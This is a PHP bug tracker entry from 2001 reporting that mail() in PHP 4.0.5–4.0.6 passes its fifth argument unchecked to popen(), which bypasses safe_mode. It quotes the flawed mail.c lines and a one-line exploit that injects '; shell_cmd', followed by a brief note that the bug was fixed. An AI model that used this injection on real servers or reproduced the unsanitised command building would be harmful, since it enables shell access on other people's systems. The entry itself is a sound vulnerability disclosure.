PHP :: Bug #12268 :: Security bug in php 4.0.5+

Bug #12268	Security bug in php 4.0.5+
Submitted:	2001-07-19 19:29 UTC	Modified:	2001-07-26 21:40 UTC
From:	hard dot disk at uol dot com dot br	Assigned:
Status:	Closed	Package:	Mail related
PHP Version:	4.0.5	OS:	Any
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	hard dot disk at uol dot com dot br
New email:
PHP Version:		OS:

New Comment:

[2001-07-19 19:29 UTC] hard dot disk at uol dot com dot br

http://www.net-security.org/text/bugs/995534103,28541,.shtml:


PHP Mail Function Vulnerability
Posted on 19.7.2001
php mail() function does not do check for escape shell commandes, even if
php is running in safe_mode.
So it's may be possible to bypass the safe_mode restriction and gain shell
access.
Affected:
php4.0.6
php4.0.5
Significatives lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("toto@toto.com",
"test",
"test",
"test",         "; shell_cmd");

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2001-07-19 20:56 UTC] rasmus@php.net

Fixed a while ago in CVS

[2021-04-06 10:19 UTC] git@php.net

Automatic comment on behalf of 
Revision: https://github.com/php/pecl-system-expect/commit/f6d02a1562d44ab6297f2b55096bb220b891bc90
Log: Fixed #12268 (Capturing output via exp_loguser from within PHP / Apache):

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Tue Jul 01 07:01:33 2025 UTC